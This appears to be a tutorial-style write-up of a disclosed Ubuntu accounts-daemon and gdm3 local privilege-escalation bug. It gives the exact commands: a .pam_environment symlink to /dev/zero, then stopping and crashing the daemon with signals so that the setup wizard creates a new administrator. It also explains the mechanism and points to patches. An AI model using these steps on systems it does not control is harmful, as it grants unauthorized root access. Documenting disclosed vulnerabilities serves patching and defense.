How to Exploit Ubuntu’s Accounts‑Daemon & GDM3 Bug to Gain Root Without a Password

Vulnerability Overview

GitHub security researcher Kevin Backhouse disclosed a privilege‑escalation vulnerability that affects all maintained Ubuntu desktop releases (20.10, 20.04, 18.04, 16.04). By creating a crafted .pam_environment symlink and manipulating the GNOME Region & Language settings, a regular user can cause the accounts-daemon service to lose its root privileges and subsequently create a new administrator account without knowing the system password.

Exploitation Steps

Create a symbolic link named .pam_environment that points to /dev/zero in the user’s home directory. If the file already exists, rename or back it up first. ln -s /dev/zero .pam_environment Open GNOME Settings → “Region & Language” and attempt to change the language. The dialog will freeze; return to the terminal without closing the settings window.

Observe that the accounts-daemon process consumes 100 % CPU. Find its PID, e.g.: pidof accounts-daemon Typical output: 597

Pause the daemon with a SIGSTOP signal: kill -SIGSTOP 597 Schedule a kill sequence that, after logout, sends SIGSEGV followed by SIGCONT to the daemon, forcing it to crash and reset:

nohup bash -c "sleep 30s; kill -SIGSEGV 597; kill -SIGCONT 597" &

Log out. After a short delay the system launches the initial‑setup wizard, which allows creation of a new user account. The newly created account is granted administrator privileges and can run sudo commands.

Underlying Mechanism

accounts‑service bug : Ubuntu ships a patched accountservice daemon that reads a file named .pam_environment from the user’s home directory via the function is_in_pam_environment. When this file is a symlink to /dev/zero, the daemon reads an infinite stream of zeros, enters an endless loop, and drops its root privileges.

GNOME Display Manager (gdm3) bug : gdm3 queries accounts-daemon to determine the number of existing users. Because the daemon is stuck, gdm3 times out, assumes zero users, and launches gnome-initial-setup, which requires an administrator account. The setup therefore permits creation of a privileged user.

Official Fix

The vulnerabilities were reported on 17 October. Ubuntu and GNOME maintainers have released patches that remove the vulnerable code paths and restore proper privilege handling. Users should apply the latest updates (e.g., via apt update && apt upgrade) as soon as possible. The issue only affects Ubuntu desktop editions; server installations and non‑GNOME desktop environments are not impacted.

Reference: https://securitylab.github.com/research/Ubuntu-gdm3-accountsservice-LPE